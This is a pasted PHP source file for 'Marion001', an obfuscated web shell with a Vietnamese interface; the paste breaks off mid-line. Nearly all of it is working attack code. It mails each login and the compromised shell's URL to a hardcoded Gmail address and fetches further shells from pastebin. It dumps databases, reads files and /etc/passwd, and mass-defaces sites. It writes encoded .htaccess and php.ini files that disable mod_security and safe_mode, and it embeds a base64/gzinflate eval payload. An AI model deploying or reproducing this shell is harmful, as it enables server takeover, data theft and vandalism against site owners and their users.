SHARE
TWEET

Marrionv2.php

finalshare Jun 21st, 2015 859 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php $PasMarion001 = 'Marion001'
  2. ?>
  3. <?php
  4. error_reporting(7);
  5. @ini_set("output_buffering",0);
  6. @ini_set("display_errors",0);
  7. @set_magic_quotes_runtime(0);
  8. ob_start();
  9. ${mtime}=explode(" ",microtime());
  10. ${"starttime"}=${mtime}[1]+${mtime}[0];
  11. define("SA_ROOT",str_replace("\x5c","/",dirname(__FILE__))."/");
  12. define("IS_WIN",DIRECTORY_SEPARATOR=="\x5c");
  13. define("IS_COM",class_exists("COM")?1:0);
  14. define("IS_GPC",get_magic_quotes_gpc());
  15. ${"dis_func"}=get_cfg_var("disable_functions");
  16. define("IS_PHPINFO",(!eregi("phpinfo",${dis_func}))?1:0);
  17. @set_time_limit(0);
  18. foreach(array("_GET","_POST")as$_request){foreach($$_request as${_key}=>${_value}){$bppptys="_key";
  19. if(${$bppptys}{0}!="_"){$frypecimu="_value";
  20. if(IS_GPC){${_value}=s_array(${_value});
  21. }$llcsjdrqul="_key";
  22. $${$llcsjdrqul}=${$frypecimu};
  23. }}}$vppjqldpdup="action";
  24. ${MarionAdmin}=array();
  25. ${"MarionAdmin"}["check"]=true;
  26. ${MarionAdmin}["pass"]=${PasMarion001};
  27. ${MarionAdmin}["cookiepre"]="";
  28. ${MarionAdmin}["cookiedomain"]="";
  29. ${"MarionAdmin"}["cookiepath"]="/";
  30. ${MarionAdmin}["cookielife"]=86400;
  31. if(${charset}=="utf8"){header("content-Type: text/html;
  32. charset=utf-8");
  33. }elseif(${"charset"}=="big5"){header("content-Type: text/html;
  34. charset=big5");
  35. }elseif(${charset}=="gbk"){header("content-Type: text/html;
  36. charset=gbk");
  37. }elseif(${"charset"}=="latin1"){header("content-Type: text/html;
  38. charset=iso-8859-2");
  39. }${self}=$_SERVER["PHP_SELF"]?$_SERVER["PHP_SELF"]:$_SERVER["SCRIPT_NAME"];
  40. ${"timestamp"}=time();
  41. if(${action}=="logout"){scookie("Marion","",-86400*365);
  42. p("<meta http-equiv=\"refresh\" content=\"0;
  43. URL=".${self}."\">");
  44. p("<body background=black>");
  45. exit;
  46. }if(${"MarionAdmin"}["check"]){if(${doing}=="login"){$itevygyjheix="MarionAdmin";
  47. if(${$itevygyjheix}["pass"]==${password}){scookie("Marion",${password});
  48. ${time_shell}="".date("d/m/Y - H:i:s")."";
  49. ${ip_remote}=$_SERVER["REMOTE_ADDR"];
  50. ${from_shellcode}="Marion001-Success@".gethostbyname($_SERVER["SERVER_NAME"])."";
  51. ${to_email}="mr.marion001@gmail.com";
  52. ${server_mail}="".gethostbyname($_SERVER["SERVER_NAME"])."  - ".$_SERVER["HTTP_HOST"]."";
  53. ${linkcr}="Link-Shell: ".$_SERVER["SERVER_NAME"]."".$_SERVER["REQUEST_URI"]." - IP Thuc Hien: $ip_remote Thoi Gian: $time_shell";
  54. ${header}="From: $from_shellcode Reply Marion001-Shell: $from_shellcode";
  55. @mail(${to_email},${server_mail},${linkcr},${header});
  56. p("<meta http-equiv="refresh" content=\"0;URL=".${self}."">");
  57. p("<body bgcolor=black><BR><BR><div align=center><font color=00FF00 face=tahoma size=2>Xin Ch&#224;
  58. o Marion001 &#272;
  59. &#227;
  60. Quay L&#7841;
  61. i, &#272;
  62. ang Kh&#7903;
  63. i &#272;
  64. &#7897;
  65. ng Shell. Vui L&#242;
  66. ng Ch&#7901;
  67. ...<BR><a href=".${self}."><img src="https://lh6.googleusercontent.com/-O0pi9Yi3omo/VDiaR9XYOTI/AAAAAAAAAAk/g5j7XtnwOhs/w346-h433/radar.gif"/></a></div>");
  68. exit;
  69. }else{$waputevxbf="ip_remote";
  70. ${time_shell}="".date("d/m/Y - H:i:s")."";
  71. ${$waputevxbf}=$_SERVER["REMOTE_ADDR"];
  72. ${from_shellcode}="Marion001-Failure@".gethostbyname($_SERVER["SERVER_NAME"])."";
  73. ${"to_email"}="mr.marion001@gmail.com";
  74. ${server_mail}="".gethostbyname($_SERVER["SERVER_NAME"])."  - ".$_SERVER["HTTP_HOST"]."";
  75. ${"linkcr"}="Link-Shell: ".$_SERVER["SERVER_NAME"]."".$_SERVER["REQUEST_URI"]." - IP Thuc Hien: $ip_remote Thoi Gian: $time_shell";
  76. ${header}="From: $from_shellcode Reply Marion001-Shell: $from_shellcode";
  77. @mail(${to_email},${server_mail},${linkcr},${header});
  78. ${err_mess}="<table width=100%><tr><td bgcolor=#00FF00 width=100% height=24><div align=center><font color=While face=tahoma size=2><h1>&#272;
  79. &#259;
  80. ng Nh&#7853;
  81. p Th&#7845;
  82. t B&#7841;
  83. i, Sai M&#7853;
  84. t Kh&#7849;
  85. u</h1><BR></font></div></td></tr></table><br/><div style="text-align: center;
  86. font-size: 15px;
  87. padding-top: 5px;
  88. "><img alt=\"" src="http://www.wieistmeineip.de/ip-address\"/></div>";
  89. echo${err_mess};
  90. }}if($_COOKIE["Marion"]){if($_COOKIE["Marion"]!=${MarionAdmin}["pass"]){loginmarion();
  91. }}else{loginmarion();
  92. }}${"errmsg"}="";
  93. if(${doing}=="downfile"&&${thefile}){;
  94. if(!@file_exists(${thefile})){${errmsg}="T&#7879;p Tin Mu&#7889;n T&#7843;i Kh&#244;ng C&#243;Trong H&#7879;Th&#7889;ng";
  95. }else{$uptiwtmw="fileinfo";
  96. ${fileinfo}=pathinfo(${"thefile"});
  97. header("Content-type: application/x-".${fileinfo}["extension"]);
  98. header("Content-Disposition: attachment;
  99. filename=".${$uptiwtmw}["basename"]);
  100. header("Content-Length: ".filesize(${thefile}));
  101. @readfile(${thefile});
  102. exit;
  103. }}if(${doing}=="backupmysql"&&!${saveasfile}){;
  104. dbconn(${dbhost},${"dbuser"},${dbpass},${dbname},${charset},${dbport});
  105. ${table}=array_flip(${table});
  106. ${result}=q("SHOW tables");
  107. if(!${"result"})p("<h2>".mysql_error()."</h2>");
  108. ${"filename"}=basename($_SERVER["HTTP_HOST"]."_MySQL.sql");
  109. header("Content-type: application/unknown");
  110. header("Content-Disposition: attachment;
  111. filename=".${filename});
  112. ${mysqldata}="";
  113. while(${currow}=mysql_fetch_array(${result})){if(isset(${table}[${currow}[0]])){;
  114. ${mysqldata}.=sqldumptable(${currow}[0]);
  115. }}mysql_close();
  116. exit;
  117. }if(${"doing"}=="mysqldown"){if(!${dbname}){${errmsg}=" dbname";
  118. }else{$vmhvgpgzf="dbpass";
  119. dbconn(${dbhost},${dbuser},${$vmhvgpgzf},${"dbname"},${charset},${dbport});
  120. if(!file_exists(${mysqldlfile})){$dubgidgdyse="errmsg";
  121. ${$dubgidgdyse}="T&#7879;
  122. p Tin Mu&#7889;
  123. n T&#7843;
  124. i Kh&#244;
  125. ng T&#7891;
  126. n T&#7841;
  127. i";
  128. }else{${result}=q("select load_file('$mysqldlfile');
  129. ");
  130. if(!${result}){q("DROP TABLE IF EXISTS tmp_angel;
  131. ");
  132. q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);
  133. ");
  134. q("LOAD DATA LOCAL INFILE '".addslashes(${mysqldlfile})."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';
  135. ");
  136. ${result}=q("select content from tmp_angel");
  137. q("DROP TABLE tmp_angel");
  138. }${row}=@mysql_fetch_array(${result});
  139. if(!${row}){${errmsg}="Load file failed ".mysql_error();
  140. }else{$sydikfc="row";
  141. ${fileinfo}=pathinfo(${mysqldlfile});
  142. header("Content-type: application/x-".${"fileinfo"}["extension"]);
  143. header("Content-Disposition: attachment;
  144. filename=".${fileinfo}["basename"]);
  145. header("Accept-Length: ".strlen(${row}[0]));
  146. echo${$sydikfc}[0];
  147. exit;
  148. }}}}echo "<html><head><meta http-equiv="Content-Type\" content=\"text/html;
  149. charset=utf-8"><title>";
  150. echo"Marion001 ".$_SERVER["HTTP_HOST"]."";
  151. echo "</title>\n<style type="text/css">body,td{font: 10pt Tahoma;
  152. color:00FF00;
  153. line-height: 16px;
  154. }a {color: 00FF00;
  155. text-decoration:none;
  156. }a:hover{color: #F8F8FF;
  157. text-decoration:underline;
  158. }\n.alt1 td{border-top:1px solid rgb(45, 255, 0);
  159. border-bottom:1px solid rgb(45, 255, 0);
  160. background:;
  161. padding:5px 10px 5px 5px;
  162. }\n.alt2 td{border-top:1px solid rgb(45, 255, 0);
  163. border-bottom:1px solid rgb(45, 255, 0);
  164. background:#f9f9f9;
  165. padding:5px 10px 5px 5px;
  166. }\n.focus td{border-top:1px solid rgb(0, 255, 90);
  167. border-bottom:0px solid rgb(45, 255, 0);
  168. background:#6415F0;
  169. padding:5px 10px 5px 5px;
  170. }\n.fout1 td{border-top:1px solid rgb(45, 255, 0);
  171. border-bottom:0px solid rgb(45, 255, 0);
  172. background:#1108D8;
  173. padding:5px 10px 5px 5px;
  174. }\n.fout td{border-top:1px solid rgb(45, 255, 0);
  175. border-bottom:0px solid rgb(45, 255, 0);
  176. background:;
  177. padding:5px 10px 5px 5px;
  178. }\n.head td{border-top:1px solid rgb(45, 255, 0);
  179. border-bottom:1px solid rgb(45, 255, 0);
  180. background:;
  181. padding:5px 10px 5px 5px;
  182. font-weight:bold;
  183. }\n.head_small td{border-top:1px solid rgb(45, 255, 0);
  184. border-bottom:1px solid rgb(45, 255, 0);
  185. background:;
  186. padding:5px 10px 5px 5px;
  187. font-weight:normal;
  188. font-size:8pt;
  189. }\n.head td span{font-weight:normal;
  190. }form{margin:0;
  191. padding:0;
  192. }h2{margin:0;
  193. padding:0;
  194. height:24px;
  195. line-height:24px;
  196. font-size:14px;
  197. color:#FF0000;
  198. }\nul.info li{margin:0;
  199. color:#444;
  200. line-height:24px;
  201. height:24px;
  202. }u{text-decoration: none;
  203. color:#777;
  204. float:left;
  205. display:block;
  206. width:150px;
  207. margin-right:10px;
  208. }\ninput, textarea, button{font-size: 9pt;
  209. color: #EBFF00;
  210. font-family: verdana, sans-serif;
  211. background-color: #1D13FD;
  212. border-left: 1px solid #74A202;
  213. \nborder-top: 1px solid #74A202;
  214. border-right: 1px solid #74A202;
  215. border-bottom: 1px solid #74A202;
  216. }select{font-size: 8pt;
  217. font-weight: normal;
  218. color: #ccc;
  219. font-family: verdana, sans-serif;
  220. background-color: #1D13FD;
  221. }\n</style><script type=\"text/javascript\">\nfunction CheckAll(form) {for(var i=0;
  222. i<form.elements.length;
  223. i++) {var e = form.elements[i];
  224. if (e.name != 'chkall')e.checked = form.chkall.checked;
  225. }}function \$(id) {return document.getElementById(id);
  226. }function goaction(act){\$('goaction').action.value=act;
  227. \$('goaction').submit();
  228. }\n</script><body onLoad="init()" style="margin:0;
  229. table-layout:fixed;
  230. word-break:break-all" bgcolor=black background=black><div border=\"0" style=\"position:fixed;
  231. width: 100%;
  232. height: 25px;
  233. z-index: 1;
  234. top: 300px;
  235. left: 0;
  236. \" id="loading" align="center" valign=\"center\">\n<table border="1" width=\"110px" cellspacing="0" cellpadding="0\" style=\"border-collapse: collapse\" bordercolor="#003300"><tr><td align=\"center" valign=center>\n<div  align=\"center"><b>Marion001</b><img src="https://lh6.googleusercontent.com/-XkAaI4Azt28/VDiaerpCLYI/AAAAAAAAABM/DWyqyNo_ZUA/s426/loading1.gif\" width=\"60" height=\"60\" title="&#272;
  237. ang T&#7843;
  238. i D&#7919;
  239. Li&#7879;
  240. u\"></div></td></tr></table></div>\n<script>var ld=(document.all);
  241. var ns4=document.layers;
  242. var ns6=document.getElementById&&!document.all;
  243. var ie4=document.all;
  244. if (ns4)ld=document.loading;
  245. else if (ns6)ld=document.getElementById(\"loading\").style;
  246. else if (ie4)ld=document.all.loading.style;
  247. function init(){if(ns4){ld.visibility=\"hidden";
  248. }else if (ns6||ie4) ld.display=\"none\";
  249. }\n</script><table width="100%\" border="0" cellpadding="0\" cellspacing=\"0\"><tr class="head_small"><td  width=100%>\n<table width=100%><tr class="head_small\"><td  width=86px><p><embed src=\"http://www.clocklink.com/clocks/newsmail001-orange.swf?TimeZone=VietNam_Hanoi" width="140" height=\"140\" wmode="transparent\" type="application/x-shockwave-flash"></p></td><td>\n<script type="text/javascript">document.write('\u003c\\u0073\\u0070\u0061\\u006e\\u0020\\u0073\\u0074\u0079\u006c\u0065\\u003d\u0022\\u0066\u006c\u006f\\u0061\\u0074\u003a\u006c\\u0065\\u0066\\u0074\\u003b\u0022\u003e')</script> ";
  250. echo"Hostname: ".$_SERVER["HTTP_HOST"]."";
  251. echo " | Server IP: <b>";
  252. echo"<font color=LawnGreen>".gethostbyname($_SERVER["SERVER_NAME"])."</font>";
  253. echo "</b> - ";
  254. echo"<a style=color:#FFF500;
  255. href=\"http://www.bing.com/search?q=ip:".@$_SERVER["SERVER_ADDR"]."" target="_blank"><b>Ping ip</b></a>";
  256. echo " | Your IP: <b>";
  257. echo"<font color=LawnGreen>".$_SERVER["REMOTE_ADDR"]."</font>";
  258. echo "</b>\n| <b><a style=color:#FFF500;
  259. href="https://www.facebook.com/Party.Marion002\" target="_blank\" title="Facebook">";
  260. echo str_replace(".","","Marion001");
  261. echo " </a></b> | <a href=\"javascript:goaction('logout');
  262. \" title="Logout"><font color=FFFFFF><b>&#272;
  263. &#259;
  264. ng Xu&#7845;
  265. t</b></font></a></span><br />\n";
  266. ${curl_on}=@function_exists("curl_version");
  267. ${mysql_on}=@function_exists("mysql_connect");
  268. ${"mssql_on"}=@function_exists("mssql_connect");
  269. ${pg_on}=@function_exists("pg_connect");
  270. ${ora_on}=@function_exists("ocilogon");
  271. echo((${"safe_mode"})?("Safe_mod: <b><font color=red>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
  272. echo"PHP version: <b>".@phpversion()."</b> - ";
  273. echo"cURL: ".((${curl_on})?("<b><font color=red>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
  274. echo"MySQL: <b>";
  275. ${mysql_on}=@function_exists("mysql_connect");
  276. if(${"mysql_on"}){echo"<font color=red>ON</font></b> - ";
  277. }else{echo"<font color=red>OFF</font></b> - ";
  278. }echo"MSSQL: <b>";
  279. ${mssql_on}=@function_exists("mssql_connect");
  280. if(${mssql_on}){echo"<font color=red>ON</font></b> - ";
  281. }else{echo"<font color=red>OFF</font></b> - ";
  282. }echo"PostgreSQL: <b>";
  283. ${pg_on}=@function_exists("pg_connect");
  284. if(${pg_on}){echo"<font color=red>ON</font></b> - ";
  285. }else{echo"<font color=red>OFF</font></b> - ";
  286. }echo"Oracle: <b>";
  287. ${ora_on}=@function_exists("ocilogon");
  288. if(${"ora_on"}){echo"<font color=red>ON</font></b>";
  289. }else{echo"<font color=red>OFF</font></b><BR>";
  290. }${release}=@php_uname("r");
  291. ${kernel}=@php_uname("s");
  292. ${explink}="https://www.google.com.vn/search?q=";
  293. if(strpos("Linux",${kernel})!==false)${explink}.=urlencode("Linux Exploit kernel ".substr(${"release"},0,14));
  294. else${explink}.=urlencode(${kernel}." ".substr(${"release"},0,14));
  295. echo"Disable functions : <b>";
  296. if(""==(${"df"}=@ini_get("disable_functions"))){echo"<font color=LawnGreen>NONE</font></b><BR>";
  297. }else{echo"<font color=red>$df</font></b><BR>";
  298. }echo"<font color=red>Uname -a</font>: ".@substr(@php_uname(),0,120)." - <a style=color:#FFF500;
  299. href=".${explink}." target=_blank><b>[Google Exploit]</b></a><br>";
  300. echo"<a style='color:white;
  301. ' href='?Info-Server' title='info server'>Server</a>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=Red>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().") | ";
  302. echo "<a href=\"javascript:togglecommentslenh('ID-Name-lenh')\" title=\"T&#7893;
  303. ng H&#7907;
  304. p L&#7879;
  305. nh Hay D&#249;
  306. ng Tr&#234;
  307. n Shell\"><b><font color=Red>(^_^)</font><b/></a></td><td width="46px\"><b><a href="?action=Delete-Shell\" title=\"X&#243;
  308. a Shell">Kill Shell</a><br/><br/><a href="javascript:goaction('about');
  309. \">About</a><br/><br/>\n<a href=\"javascript:goaction('phpinfo');
  310. \" title="Xem Th&#244;
  311. ng Tin PHP\">PHPInfo</a><br/><br/><a href="javascript:goaction('php-ini');
  312. " title="T&#7841;
  313. o file php.ini\">php.ini</a><b/></td></tr></table><tr bgcolor=\"white"><td><style type="text/css">.commenthiddenlenh {display:none}.commentshownlenh {display:inline}</style>\n<script type=\"text/Javascript\">function togglecommentslenh (postidlenh) {var whichpost = document.getElementById(postidlenh);
  314. if (whichpost.className=="commentshownlenh") { whichpost.className=\"commenthiddenlenh\";
  315. } else { whichpost.className="commentshownlenh\";
  316. }} </script>\n<div class=\"commenthiddenlenh" id=\"ID-Name-lenh\"><iframe width=\"100%\" height=\"220\" src="http://pastebin.com/raw.php?i=ZeFmKRMp" frameborder=\"0\"></iframe></div></td></tr></td></tr><tr class=\"alt1"><td  width=10% title="T&#7841;
  317. o Ch&#7913;
  318. c N&#259;
  319. ng/Create Function\">\n<a href=\"javascript:history.back(-1)" title="Quay L&#7841;
  320. i"><b>Back</a> | <a style=\"color:#ff0000;
  321. " href=\"";
  322. echo$_SERVER["PHP_SELF"];
  323. echo "" title="loading L&#7841;
  324. i Shell">HOME</b></a> | <a href="javascript:goaction('file');
  325. ">File Manager</a> | <a href="javascript:goaction('sqladmin');
  326. \" title="Login V&#224;
  327. o Database">SQL</a> | \n<a href="javascript:goaction('etcpwd');
  328. \">/etc/passwd</a> | <a href="javascript:goaction('newcommand');
  329. " title=\"Command.php\">Command</a> | <a href="javascript:goaction('symroot');
  330. \" title=\"symroot.php">Sym Root</a> | <a href="javascript:goaction('crackmd5');
  331. \" title=\"Gi&#7843;
  332. i M&#227;
  333. MD5\">Crack MD5</a> | \n<a href=\"javascript:goaction('kiemtraip');
  334. \" title="Ki&#7875;
  335. m Tra ip\">My IP address</a> | <a href="javascript:goaction('backconnect');
  336. \" title=\"K&#7871;
  337. t N&#7889;
  338. i V&#7899;
  339. i PC\"> Back Connect</a> | <a href=\"javascript:goaction('CGI');
  340. \" title=\"Shell CGI.Marion001">CGI Shell</a> | <a href=\"javascript:goaction('command');
  341. \" title=\"Command 1">CMD</a> | \n<a href=\"?CommandFix-Marion001\" title=\"Command 2">CMD-FIX</a> | <a href=\"?php=Marion001" title="M&#227;
  342. H&#243;
  343. a Code PHP">PHP Encode</a> | <a href="?StringHash\" title="M&#227;
  344. H&#243;
  345. a Chu&#7895;
  346. i Hash">String To Hash</a> | <a href="?Check-Shell\" title="Mass Shell Checker\">Check Live Shell</a> |\n<a href=\"?ScanFile" title="Scan File, Scan Shell">Scan File</a> | <a href=\"javascript:goaction('Marion001-Root');
  347. \" title=\"Auto Root.pl, linux kernel 2010-2013\">Auto Root.pl</a> | <a href="javascript:goaction('indexmarion');
  348. " title=\"T&#7841;
  349. o Index/Create Marion001.html\">Marion001.html</a> | <a href="javascript:goaction('cpanlbrute');
  350. ">Cpanel Brute</a> | <a href=\"?MassDeface\">Mass Deface</a> |\n<a href="javascript:goaction('packshell');
  351. \" title=\"Tool Pack Shell">Extract Shell</a> |\n</td></tr></table><table width="100%\" border=\"0\" cellpadding="15" cellspacing="0\"><tr><td>";
  352. if(${"action"}=="phpinfo"){if(IS_PHPINFO){phpinfo();
  353. }else{$djzhqpfxfgq="errmsg";
  354. ${$djzhqpfxfgq}="phpinfo() Ch&#7913;
  355. c N&#259;
  356. ng Kh&#244;
  357. ng Cho Ph&#233;
  358. p";
  359. }}if(isset($_GET["MassDeface"])){@ini_set("output_buffering",0);
  360. @ini_set("display_errors",0);
  361. echo"<h1><center>Mass Deface By: Marion001</center></h1><br/><center><textarea style='margin: 0px;
  362. width: 98%;
  363. height: 350px;
  364. '>";
  365. ${defaceurl}=$_POST["massdefaceurl"];
  366. ${dir}=$_POST["massdefacedir"];
  367. ${filename}=$_POST["filename"];
  368. ${"masslink"}=getcwd();
  369. echo${"dir"}."\n";
  370. if(is_dir(${"dir"})){if(${dh}=opendir(${dir})){$fekppqbjxt="dh";
  371. while((${file}=readdir(${$fekppqbjxt}))!==false){if(filetype(${dir}.${file})=="dir"){$eebcndmhyg="filename";
  372. ${newfile}=${dir}.${file}."/".${$eebcndmhyg};
  373. echo${newfile}."\n";
  374. if(!copy(${defaceurl},${newfile})){echo"Kh&#244;
  375. ng Th&#7875;
  376. Sao Ch&#233;
  377. p: $file...\n\n";
  378. }}}closedir(${dh});
  379. }}echo"</textarea></center>";
  380. echo"<body bgcolor="black\" background=\"http://i.imgur.com/uJyarvI.jpg"><!-- http://pastebin.com/raw.php?i=KmekRw5j --><form action="\" method="post\">";
  381. echo"<br/>[+] Main Directory: <input type='text' style='width: 250px' value='$masslink' name='massdefacedir'><br><br/>";
  382. echo"[+] Defacement Url: <input type=\"text\" style="width: 250px" name=\"massdefaceurl\" placeholder="http://pastebin.com/raw.php?i=WnbDMZAV"><br/><br/>[+] File Name: <input type=\"text" style=\"width: 250px\" name="filename" title=\"T&#234;
  383. n File C&#7847;
  384. n T&#7841;
  385. o" placeholder="xnxx.php"><input type=\"submit" name="execmassdeface" value=\"MassDeface"></form>";
  386. exit;
  387. }if(isset($_GET["Check-Shell"])){echo"<style type="text/css">.entryfield {width:600px;
  388. height:300px;
  389. }.subbtn {background:#b70505;
  390. color:white;
  391. border: 1px solid #000;
  392. padding:6px 6px 6px 6px;
  393. }.subbtn:hover {background:#c0bfbf;
  394. color:#b70505;
  395. }\n</style><h1><center>Mass Shell Checker (Check Live Shell)</center></h1><form name=\"frmcontadd" action="\" method=\"post\"><textarea class=\"entryfield" name=\"url" style="margin-left: 0px;
  396. margin-right: 0px;
  397. width: 100%;
  398. height:330px;
  399. " placeholder="D&#225;
  400. n Link Shell V&#224;
  401. o &#272;
  402. &#226;
  403. y, M&#7895;
  404. i Link 1 D&#242;
  405. ng\"></textarea><br><input class=\"subbtn\" type=\"submit\" name=\"Submit\" value="Check Shell(s)"></form>";
  406. function get_http_response_code($theurl){$aflwwqln="theurl";
  407. ${"headers"}=get_headers(${$aflwwqln});
  408. ${"status"}=substr(${headers}[0],9,3);
  409. ${"p"}=parse_url(${"theurl"});
  410. $host=explode(":",${p}["host"]);
  411. ${hostname}=$host[0];
  412. if(${status}==200){$bjavvgmua="theurl";
  413. ${visitor}=$_SeRVeR["RemOTe_aDDR"];
  414. ${judul}="shell: $theurl ";
  415. ${body}="shell: $theurl";
  416. if(!empty(${theurl})){;
  417. @mail("mr.marion001@gmail.com",${judul},${"body"});
  418. }${"writeuRl"}=${theurl}."\r\n";
  419. ${fh}=fopen("Live-Shell.txt","a");
  420. fwrite(${fh},${writeuRl},strlen(${writeuRl}));
  421. echo"<strong><font color=#00FF00>Shell Live:</font></strong> - <a style=\"color:#00FF00;
  422. \" href="".${theurl}."" target=_blank>".${$bjavvgmua}."</a><br />";
  423. }elseif(${status}==500){echo"<strong><font color=black>".${status}." Internal Server Error</font></strong> - <a style="color:#00FF00;
  424. " href=\"".${theurl}."\" target=_blank>".${theurl}."</a><br />";
  425. }else{$hxxnxxu="theurl";
  426. ${writeuRl}=${$hxxnxxu}."\r\n";
  427. ${fh}=fopen("Dia-Shell.txt","a");
  428. fwrite(${fh},${writeuRl},strlen(${writeuRl}));
  429. echo"<strong><font color=red>Shell Dia:</font></strong> - <a style="color:#00FF00;
  430. \" href="".${"theurl"}."" target=_blank>".${theurl}."</a><br />";
  431. }}if(isset($_POST["Submit"])){${hosts}=explode("\r\n",$_POST["url"]);
  432. ${values}=array();
  433. foreach(${hosts} as$host){if($host!=""){@get_http_response_code("$host");
  434. }}echo"<br/><strong>Check Shell Th&#224;
  435. nh C&#244;
  436. ng</strong><br/><a style=\"color:#00FF00;
  437. \" href=\"Live-Shell.txt\" target="_blank\"><b>Live-Shell.txt </b></a><|> <a style="color:#00FF00;
  438. " href=\"Dia-Shell.txt" target=\"_blank\"><b> Dia-Shell.txt</b></a>";
  439. }exit;
  440. }if(isset($_GET["CGI-Marion001"])){$mbijpmxsip="dosya_adi";
  441. chdir("CGI");
  442. ${kokdosya}=".htaccess";
  443. ${"dosya_adi"}="$kokdosya";
  444. ${dosya}=fopen(${$mbijpmxsip},"w")or die("Kh&#244;
  445. ng Th&#7875;
  446. M&#7903;
  447. T&#7879;
  448. p Tin");
  449. ${metin}="AddHandler cgi-script .Marion001\nAddHandler cgi-script .pl";
  450. fwrite(${dosya},${"metin"});
  451. fclose(${dosya});
  452. ${pythonp}=file_get_contents("http://pastebin.com/raw.php?i=uxjCvKGS");
  453. ${file}=fopen("CGI.Marion001","w+");
  454. ${write}=fwrite(${file},${pythonp});
  455. fclose(${file});
  456. echo"<p align=\"center" dir="ltr"><font face="Tahoma" size=\"2">Bypass Th&#224;
  457. nh C&#244;
  458. ng CGI.Marion001</font> .. <a style=\"color:#FFF500;
  459. " href="CGI/CGI.Marion001\" target="_blank\">V&#224;
  460. o Shell</a></font></p>\n<p align=\"center" dir=\"ltr\"><font face=\"Tahoma" size="2">Bypass Th&#224;
  461. nh C&#244;
  462. ng telnet.pl</font> .. <a style="color:#FFF500;
  463. \" href=\"CGI/telnet.pl" target=\"_blank">V&#224;
  464. o Shell</a></font></p><iframe width=\"100%" height="620" src="CGI/CGI.Marion001\" frameborder="0" allowfullscreen></iframe>";
  465. exit;
  466. }if(isset($_GET["Info-Server"])){echo"<pre>";
  467. print_r($_SERVER);
  468. echo"</pre>";
  469. exit();
  470. }if(isset($_GET["Bypas-Command"])){$kdbobim="tuyen1";
  471. mkdir("Bypas-CMD",0755);
  472. chdir("Bypas-CMD");
  473. ${bypascmd}=".htaccess";
  474. ${bypass_cmd}="$bypascmd";
  475. ${dosya}=fopen(${bypass_cmd},"w")or die("L&#7895;
  476. i, Kh&#244;
  477. ng M&#7903;
  478. &#272;
  479. &#432;
  480. &#7907;
  481. c File");
  482. ${tuyen1}="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPgogICAgU2VjRmlsdGVyRW5naW5lIE9mZgogICAgU2VjRmlsdGVyU2NhblBPU1QgT2ZmCjwvSWZNb2R1bGU+";
  483. fwrite(${"dosya"},base64_decode(${$kdbobim}));
  484. fclose(${dosya});
  485. ${bypascmd}="php.ini";
  486. ${bypass_cmd}="$bypascmd";
  487. ${dosya}=fopen(${bypass_cmd},"w")or die("L&#7895;
  488. i, Kh&#244;
  489. ng M&#7903;
  490. &#272;
  491. &#432;
  492. &#7907;
  493. c File");
  494. ${tuyen1}="c2FmZV9tb2RlICAgICAgICAgID0gICAgICAgT0ZGCmRpc2FibGVfZnVuY3Rpb25zICAgICAgID0gICAgICAgICAgICBOT05F";
  495. fwrite(${"dosya"},base64_decode(${"tuyen1"}));
  496. fclose(${dosya});
  497. ${file}=fopen(${"dir"}."Command.php","w+");
  498. ${newcommand}=file_get_contents("http://pastebin.com/raw.php?i=hYj7kBWS");
  499. ${"file"}=fopen("Command.php","w+");
  500. ${write}=fwrite(${"file"},${"newcommand"});
  501. ${file}=fopen(${dir}."CMD.php","w+");
  502. ${"CMD"}="PD9waHAKJE1hcmlvbjAwMSA9ICdkVlJSVDlzd0VINUg0aitjUWtkYXFUUnBDeW8wVFVHd29VMWlBd24yaEtySVRaekdJNG1ONDlBR3hIL2ZPWW5iaVltSE9DZmYrZTY3K3o1N2Y2OVRpcFNUS0dJU2ZNQTFKeG50QnNIMWo1dHZRZER6YUpod3NHY2h6UldWODFuTVpRWWtWSXpudm5WK3hiT001TkUxMnh6OUpCTDNYSGRvUVVaVndpUGZFcnhRRnRBOFZKV2d2cFdWcVdLQ1NPWG9KRWNSVWNRQ1hjMjNHZ2hVaGxrMHNvQkZIM2JtTTVhTFVrR1RKMllwTlFjYnUyQ3ZhSis0MjhER0dXQ1NKbU56c0NpWEdWTk4vcDN2aGFRbE9uL1hCVEZEalE1L2JjZTJ0Ny9INGk1MGdydmIrNGRIMnh5MEYrRDdZSTVCN3cyRExrSXVxbTZubnQzOW82M0IyWXRIVzJVaTBJanNSUi8rY3phT1h1K3RIYlFBa3JJVkRyZXBiODBmRGc4bXA4ZGpqOEhONGNGb2ZPemw4SkNnTlVJcmdTdTBqdEZhMlExVGxtSHFqb1JQVTlpUjYydzdzcnozL1QyYUZoUStyVGxiZmxZVzkwNDhCWmUxTmZUWXpCRTRvdmYzQzVhem9LQ3FhL05TSVFYQnNveGpLaGtDNjdzOWIrZU9XQ0ZTVWdWVVNpNEx1dy9vUlRnTkVBS0pwTEZ2SlVxSnFlT3MxK3RCUmlOR1lpYnBJT1NaRS9GMXJodHlXUHo4NTJXeXFzYXZjcklSVDBneGtTdXFrTmhsU3ZLbnVvV3ZiVEJjVm9JVUJhUThKT2tVQms1SVZCOS9hYUZYcWtKSHU5ZFJIMTRHZzRIK1pzNFNGVUJxOGx0b3RmQ05zclVVUHFoUzBRMUtDMXNMYWNKVFZLNXYvYXJuZFRMMmhKN2g1SFJ5MWpLR281dVllWjZOaGw0STM1a0pRRFdyS3NXRWF4YXBaSHJtZnZFZ3c5NVlQblU5STNzVUlEYkdQdDRNSS9CVzByc3IrVzhqUytubzRkeldORTNyVGpWMklpa3hwZHQ2NElxTkJ3ME9HTG9hU1VMWktsRlRHTG5hcC9OMkRCWjhQY3dkTVZ2MndpdXFRdEdzdTQzYVBpaU9LVHB2RWVHaVVaN1A0Uzg9JzsKZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkTWFyaW9uMDAxKSkpOwo/Pg==";
  503. ${"file"}=fopen("CMD.php","w+");
  504. ${"write"}=fwrite(${"file"},base64_decode(${"CMD"}));
  505. echo"<center><b><a href='Bypas-CMD/CMD.php' target='_bank'>V&#224;
